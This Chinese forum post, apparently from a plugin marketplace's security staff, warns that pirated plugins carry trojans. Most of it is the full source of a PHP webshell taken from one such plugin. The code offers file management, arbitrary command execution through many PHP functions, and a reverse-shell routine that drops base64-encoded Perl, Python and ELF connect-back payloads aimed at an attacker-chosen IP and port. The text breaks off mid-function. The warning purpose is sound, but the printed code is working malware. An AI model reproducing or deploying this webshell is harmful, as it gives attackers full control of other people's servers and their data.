震惊：从某盗版插件里扒出的木马文件，你在人家面前裸奔

安全专员 發表於 2019-7-15 10:08:01

震惊：从某盗版插件里扒出的木马文件，你在人家面前裸奔

<br /><br />传送门：安全小知识：为什么使用盗版插件容易被挂马<br /><br /><img title="VERSION.png" id="aimg_1381" aid="1381" src1="static/image/common/none.gif" zoom="https://www.dismall.com/data/attachment/forum/201907/15/100327mtzqctdpm7etqqe7.png" src="https://www.dismall.com/data/attachment/forum/201907/15/100327mtzqctdpm7etqqe7.png" class="zoom" onclick="zoom(this, this.src, 0, 0, 0)" width="600" inpost="1" onmouseover="showMenu({'ctrlid':this.id,'pos':'12'})" /><br /><br />上图，木马文件运行后的效果，对方想干什么都可以...这不是裸奔是什么？<br /><br />木马代码如下：<br /><ol><li><?php<br /><li>@error_reporting(E_ERROR);<br /><li>@ini_set('display_errors', 'Off');<br /><li>@ini_set('max_execution_time', 3600);<br /><li>header("content-Type: text/html; charset=gb2312");<br /><li>function strdir($str)<br /><li>{<br /><li>    return str_replace(array(<br /><li>        '\\',<br /><li>        '//',<br /><li>        '%27',<br /><li>        '%22'<br /><li>    ), array(<br /><li>        '/',<br /><li>        '/',<br /><li>        '\'',<br /><li>        '"'<br /><li>    ), chop($str));<br /><li>}<br /><li>function chkgpc($array)<br /><li>{<br /><li>    foreach ($array as $key => $var) {<br /><li>        $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);<br /><li>    }<br /><li>    return $array;<br /><li>}<br /><li>define('MYFILE', strdir(__FILE__));<br /><li>define('THISDIR', strdir(dirname(MYFILE) . '/'));<br /><li>$rootdir = strdir(strtr(MYFILE, array(<br /><li>    strdir($_SERVER['PHP_SELF']) => ''<br /><li>)) . '/');<br /><li>$rootdir = strpos($rootdir, 'eval()') ? array_shift(explode('(', $rootdir)) : $rootdir;<br /><li>define('ROOTDIR', strdir($rootdir . '/'));<br /><li>define('EXISTS_PHPINFO', getinfo($password) ? true : false);<br /><li>if (get_magic_quotes_gpc()) {<br /><li>    $_POST = chkgpc($_POST);<br /><li>}<br /><li>if (function_exists('mysql_close')) {<br /><li>    $issql = 'MySql';<br /><li>}<br /><li>if (function_exists('mssql_close'))<br /><li>    $issql .= ' - MsSql';<br /><li>if (function_exists('oci_close'))<br /><li>    $issql .= ' - Oracle';<br /><li>if (function_exists('sybase_close'))<br /><li>    $issql .= ' - SyBase';<br /><li>if (function_exists('pg_close'))<br /><li>    $issql .= ' - PostgreSql';<br /><li>$win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;<br /><li>$msg = VERSION . ' - ' . date('Y-m-d H:i:s 星期N', time());<br /><li>function filew($filename, $filedata, $filemode)<br /><li>{<br /><li>    if ((!is_writable($filename)) && file_exists($filename)) {<br /><li>        chmod($filename, 0666);<br /><li>    }<br /><li>    $handle = fopen($filename, $filemode);<br /><li>    $key    = fputs($handle, $filedata);<br /><li>    fclose($handle);<br /><li>    return $key;<br /><li>}<br /><li>function filer($filename)<br /><li>{<br /><li>    $handle   = fopen($filename, 'r');<br /><li>    $filedata = fread($handle, filesize($filename));<br /><li>    fclose($handle);<br /><li>    return $filedata;<br /><li>}<br /><li>function fileu($filenamea, $filenameb)<br /><li>{<br /><li>    $key = move_uploaded_file($filenamea, $filenameb) ? true : false;<br /><li>    if (!$key) {<br /><li>        $key = copy($filenamea, $filenameb) ? true : false;<br /><li>    }<br /><li>    return $key;<br /><li>}<br /><li>function filed($filename)<br /><li>{<br /><li>    if (!file_exists($filename))<br /><li>        return false;<br /><li>    $name  = basename($filename);<br /><li>    $array = explode('.', $name);<br /><li>    header('Content-type: application/x-' . array_pop($array));<br /><li>    header('Content-Disposition: attachment; filename=' . $name);<br /><li>    header('Content-Length: ' . filesize($filename));<br /><li>    @readfile($filename);<br /><li>    exit;<br /><li>}<br /><li>function showdir($dir)<br /><li>{<br /><li>    $dir = strdir($dir . '/');<br /><li>    if (!is_readable($dir))<br /><li>        return false;<br /><li>    $handle = opendir($dir);<br /><li>    $array  = array();<br /><li>    while ($name = readdir($handle)) {<br /><li>        if ($name == '.' || $name == '..')<br /><li>            continue;<br /><li>        $path = $dir . $name;<br /><li>        $name = strtr($name, array(<br /><li>            '\'' => '%27',<br /><li>            '"' => '%22'<br /><li>        ));<br /><li>        if (is_dir($path)) {<br /><li>            $array['dir'][$path] = $name;<br /><li>        } else {<br /><li>            $array['file'][$path] = $name;<br /><li>        }<br /><li>    }<br /><li>    closedir($handle);<br /><li>    return $array;<br /><li>}<br /><li>function deltree($dir)<br /><li>{<br /><li>    $handle = @opendir($dir);<br /><li>    while ($name = @readdir($handle)) {<br /><li>        if ($name == '.' || $name == '..')<br /><li>            continue;<br /><li>        $path = $dir . $name;<br /><li>        @chmod($path, 0777);<br /><li>        if (is_dir($path)) {<br /><li>            deltree($path . '/');<br /><li>        } else {<br /><li>            @unlink($path);<br /><li>        }<br /><li>    }<br /><li>    @closedir($handle);<br /><li>    return @rmdir($dir);<br /><li>}<br /><li>function postinfo($array)<br /><li>{<br /><li>    $infos = array(<br /><li>        function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"),<br /><li>        function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")<br /><li>    );<br /><li><br /><li>}<br /><li>function size($bytes)<br /><li>{<br /><li>    if ($bytes < 1024)<br /><li>        return $bytes . ' B';<br /><li>    $array = array(<br /><li>        'B',<br /><li>        'K',<br /><li>        'M',<br /><li>        'G',<br /><li>        'T'<br /><li>    );<br /><li>    $floor = floor(log($bytes) / log(1024));<br /><li>    return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor))));<br /><li>}<br /><li>function find($array, $string)<br /><li>{<br /><li>    foreach ($array as $key) {<br /><li>        if (stristr($string, $key))<br /><li>            return true;<br /><li>    }<br /><li>    return false;<br /><li>}<br /><li>function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)<br /><li>{<br /><li>    $handle = opendir($dir);<br /><li>    while ($name = readdir($handle)) {<br /><li>        if ($name == '.' || $name == '..')<br /><li>            continue;<br /><li>        $path = $dir . $name;<br /><li>        if (is_dir($path)) {<br /><li>            if ($fit && in_array($name, $fit))<br /><li>                continue;<br /><li>            if ($ran == 0 && is_readable($path))<br /><li>                scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now);<br /><li>        } else {<br /><li>            if ($inc && (!find($inc, $name)))<br /><li>                continue;<br /><li>            $code = $tye ? filer($path) : $name;<br /><li>            $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), 'M') ? false : (strpos($code, $key) > -1));<br /><li>            if ($find) {<br /><li>                $file = strtr($path, array(<br /><li>                    $now => '',<br /><li>                    '\'' => '%27',<br /><li>                    '"' => '%22'<br /><li>                ));<br /><li>                echo '<a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';<br /><li>                flush();<br /><li>                ob_flush();<br /><li>            }<br /><li>            unset($code);<br /><li>        }<br /><li>    }<br /><li>    closedir($handle);<br /><li>    return true;<br /><li>}<br /><li>function antivirus($dir, $exs, $matches, $now)<br /><li>{<br /><li>    $handle = opendir($dir);<br /><li>    while ($name = readdir($handle)) {<br /><li>        if ($name == '.' || $name == '..')<br /><li>            continue;<br /><li>        $path = $dir . $name;<br /><li>        if (is_dir($path)) {<br /><li>            if (is_readable($path))<br /><li>                antivirus($path . '/', $exs, $matches, $now);<br /><li>        } else {<br /><li>            $iskill = NULL;<br /><li>            foreach ($exs as $key => $ex) {<br /><li>                if (find(explode('|', $ex), $name)) {<br /><li>                    $iskill = $key;<br /><li>                    break;<br /><li>                }<br /><li>            }<br /><li>            if (strpos(size(filesize($path)), 'M'))<br /><li>                continue;<br /><li>            if ($iskill) {<br /><li>                $code = filer($path);<br /><li>                foreach ($matches[$iskill] as $matche) {<br /><li>                    $array = array();<br /><li>                    preg_match($matche, $code, $array);<br /><li>                    if (strpos($array, '$this->') || strpos($array, '[$vars['))<br /><li>                        continue;<br /><li>                    $len = strlen($array);<br /><li>                    if ($len > 10 && $len < 150) {<br /><li>                        $file = strtr($path, array(<br /><li>                            $now => '',<br /><li>                            '\'' => '%27',<br /><li>                            '"' => '%22'<br /><li>                        ));<br /><li>                        echo '特征 <input type="text" value="' . htmlspecialchars($array) . '"> <a href="javascript:void(0);" onclick="go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>';<br /><li>                        flush();<br /><li>                        ob_flush();<br /><li>                        break;<br /><li>                    }<br /><li>                }<br /><li>                unset($code, $array);<br /><li>            }<br /><li>        }<br /><li>    }<br /><li>    closedir($handle);<br /><li>    return true;<br /><li>}<br /><li>function command($cmd, $cwd, $com = false)<br /><li>{<br /><li>    $iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false;<br /><li>    $res   = $msg = '';<br /><li>    if ($cwd == 'com' || $com) {<br /><li>        if ($iswin && class_exists('COM')) {<br /><li>            $wscript = new COM('Wscript.Shell');<br /><li>            $exec    = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd);<br /><li>            $stdout  = $exec->StdOut();<br /><li>            $res     = $stdout->ReadAll();<br /><li>            $msg     = 'Wscript.Shell';<br /><li>        }<br /><li>    } else {<br /><li>        chdir($cwd);<br /><li>        $cwd = getcwd();<br /><li>        if (function_exists('exec')) {<br /><li>            @exec($cmd, $res);<br /><li>            $res = join("\n", $res);<br /><li>            $msg = 'exec';<br /><li>        } elseif (function_exists('shell_exec')) {<br /><li>            $res = @shell_exec($cmd);<br /><li>            $msg = 'shell_exec';<br /><li>        } elseif (function_exists('system')) {<br /><li>            ob_start();<br /><li>            @system($cmd);<br /><li>            $res = ob_get_contents();<br /><li>            ob_end_clean();<br /><li>            $msg = 'system';<br /><li>        } elseif (function_exists('passthru')) {<br /><li>            ob_start();<br /><li>            @passthru($cmd);<br /><li>            $res = ob_get_contents();<br /><li>            ob_end_clean();<br /><li>            $msg = 'passthru';<br /><li>        } elseif (function_exists('popen')) {<br /><li>            $fp = @popen($cmd, 'r');<br /><li>            if ($fp) {<br /><li>                while (!feof($fp)) {<br /><li>                    $res .= fread($fp, 1024);<br /><li>                }<br /><li>            }<br /><li>            @pclose($fp);<br /><li>            $msg = 'popen';<br /><li>        } elseif (function_exists('proc_open')) {<br /><li>            $env     = $iswin ? array(<br /><li>                'path' => 'c:\\windows\\system32'<br /><li>            ) : array(<br /><li>                'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'<br /><li>            );<br /><li>            $des     = array(<br /><li>                0 => array(<br /><li>                    "pipe",<br /><li>                    "r"<br /><li>                ),<br /><li>                1 => array(<br /><li>                    "pipe",<br /><li>                    "w"<br /><li>                ),<br /><li>                2 => array(<br /><li>                    "pipe",<br /><li>                    "w"<br /><li>                )<br /><li>            );<br /><li>            $process = @proc_open($cmd, $des, $pipes, $cwd, $env);<br /><li>            if (is_resource($process)) {<br /><li>                fwrite($pipes, $cmd);<br /><li>                fclose($pipes);<br /><li>                $res .= stream_get_contents($pipes);<br /><li>                fclose($pipes);<br /><li>                $res .= stream_get_contents($pipes);<br /><li>                fclose($pipes);<br /><li>            }<br /><li>            @proc_close($process);<br /><li>            $msg = 'proc_open';<br /><li>        }<br /><li>    }<br /><li>    $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用' . $msg . '执行成功</h2>';<br /><li>    return array(<br /><li>        'res' => $res,<br /><li>        'msg' => $msg<br /><li>    );<br /><li>}<br /><li>function backshell($ip, $port, $dir, $type)<br /><li>{<br /><li>    $key   = false;<br /><li>    $c_bin = 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==';<br /><li>    switch ($type) {<br /><li>        case "pl":<br /><li>            $shell = 'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K';<br /><li>            $file  = strdir($dir . '/t00ls.pl');<br /><li>            $key   = filew($file, base64_decode($shell), 'w');<br /><li>            if ($key) {<br /><li>                @chmod($file, 0777);<br /><li>                command('/usr/bin/perl ' . $file . ' ' . $ip . ' ' . $port, $dir);<br /><li>            }<br /><li>            break;<br /><li>        case "py":<br /><li>            $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==';<br /><li>            $file  = strdir($dir . '/t00ls.py');<br /><li>            $key   = filew($file, base64_decode($shell), 'w');<br /><li>            if ($key) {<br /><li>                @chmod($file, 0777);<br /><li>                command('/usr/bin/python ' . $file . ' ' . $ip . ' ' . $port, $dir);<br /><li>            }<br /><li>            break;<br /><li>        case "c":<br /><li>            $file = strdir($dir . '/t00ls');<br /><li>            $key  = filew($file, base64_decode($c_bin), 'wb');<br /><li>            if ($key) {<br /><li>                @chmod($file, 0777);<br /><li>                command($file . ' ' . $ip . ' ' . $port, $dir);<br /><li>            }<br /><li>            break;<br /><li>        case "php":<br /><li>        case "phpwin":<br /><li>            if (function_exists('fsockopen')) {<br /><li>                $sock = @fsockopen($ip, $port);<br /><li>                if ($sock) {<br /><li>                    $key  = true;<br /><li>                    $com  = $type == 'phpwin' ? true : false;<br /><li>                    $user = get_current_user();<br /><li>                    $dir  = strdir(getcwd());<br /><li>                    fputs($sock, php_uname() . "\n------------no job control in this shell (tty)-------------\n[$user:$dir]# ");<br /><li>                    while ($cmd = fread($sock, 1024)) {<br /><li>                        if (substr($cmd, 0, 3) == 'cd ') {<br /><li>                            $dir = trim(substr($cmd, 3, -1));<br /><li>                            chdir(strdir($dir));<br /><li>                            $dir = 